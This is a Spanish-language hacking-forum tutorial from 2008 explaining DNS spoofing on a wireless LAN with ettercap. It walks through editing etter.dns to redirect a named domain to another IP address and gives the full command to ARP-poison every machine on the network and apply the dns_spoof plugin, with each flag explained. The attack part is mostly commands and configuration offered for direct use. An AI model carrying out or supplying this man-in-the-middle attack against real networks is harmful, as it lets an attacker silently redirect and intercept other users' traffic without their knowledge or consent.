Soy V-Getah y en este tutorial les voy mostrar como se hace DNS Spoof en una rede WLAN mediante el ettercap...
Bueno lo que necesitan de instalar es el solo el ettercap.
Ahora lo que haremos es abrir la Consola y necesitamos de saber qual es la placa de rede a que vamos spoofear el DNS.
Para saber eso ejecutamos este comando:
Citar
ifconfig
Ya temos el nombre de la placa de red usada (ver imagen) ahora vamos buscar el fichero etter.dns, para eso escribimos esto en la Consola:
Citar
locate etter.dns
Lo mio es: /usr/share/ettercao/etter.dns
Ahora en la consola escribimos sudo gedit seguido de la localizacion del etter.dns y nos abrira el fichero. Ejemplo:
Citar
sudo gedit /usr/share/ettercap/etter.dns
Les aparecera algo a pedir tu password y la escribes depues se abrira el etter.dns con el gedit:
Estas son las lineas que vamos hacer corresponder los DNS a los IPs pretendidos :$
Código:
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
microsoft.com A 207.46.197.32
##########################################
Hum vamos por ejemplo hacer con que www.diosdelared.com sea redireccionado para 72.14.221.104 que es el IP de google (para saber los IPs ejecuten el comando nslookup).
Entonces lo que escriberiamos seria esto:
Citar
www.diosdelared.com A 72.14.221.104
diosdelared.com A 72.14.221.104
*.diosdelared.com A 72.14.221.104
diosdelared.com A 72.14.221.104
*.diosdelared.com A 72.14.221.104
y el fichero etter.dns quedaria asi:
Código:
############################################################################
# #
# ettercap -- etter.dns -- host file for dns_spoof plugin #
# #
# Copyright (C) ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
# #
# Sample hosts file for dns_spoof plugin #
# #
# the format is (for A query): #
# www.myhostname.com A 168.11.22.33 #
# *.foo.com A 168.44.55.66 #
# #
# or for PTR query: #
# www.bar.com A 10.0.0.10 #
# #
# or for MX query: #
# domain.com MX xxx.xxx.xxx.xxx #
# #
# or for WINS query: #
# workgroup WINS 127.0.0.1 #
# PC* WINS 127.0.0.1 #
# #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests #
# so if you want to reverse poison you have to specify a plain #
# host. (look at the www.microsoft.com example) #
# #
############################################################################
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
www.diosdelared.com A 72.14.221.104
diosdelared.com A 72.14.221.104
*.diosdelared.com A 72.14.221.104
##########################################
# no one out there can have our domains...
#
www.alor.org A 127.0.0.1
www.naga.org A 127.0.0.1
###############################################
# one day we will have our ettercap.org domain
#
www.ettercap.org A 127.0.0.1
ettercap.sourceforge.net A 216.136.171.201
###############################################
# some MX examples
#
alor.org MX 127.0.0.1
naga.org MX 127.0.0.1
###############################################
# This messes up NetBIOS clients using DNS
# resolutions. I.e. Windows/Samba file sharing.
#
LAB-PC* WINS 127.0.0.1
# vim:ts=8:noexpandtab
Ahora vamos ejecutar el comando "su" para nos loguearmos como root y de seguida este comando:
Citar
ettercap -T -q -i eth1 -P dns_spoof -M arp // //
Explicacion del comando:
Código:
-T = text mode
-q = quiet
-i = interface (la mia es eth1)
-P dns_spoof = usar el plugin dns_spoof del ettercap
-M arp = ManInTheMiddle ARP
// // = Todas las maquinas de la red
Y nos va sallir esto:
Ahora voy a una maquina con windows instalado y:
Si hay dudas o qualquier pergunta hagan! Este tuto fue 100% hecho por mi si lo van copiar dejen los creditos
Greetz:
xtremo, reberto, Login-Root, MurdeR, KaoS, Ragnarok, kfOO, Anarkill, Xarnuz, NoStress, m0x, zer0-z0org
Copyright © V-Getah 2008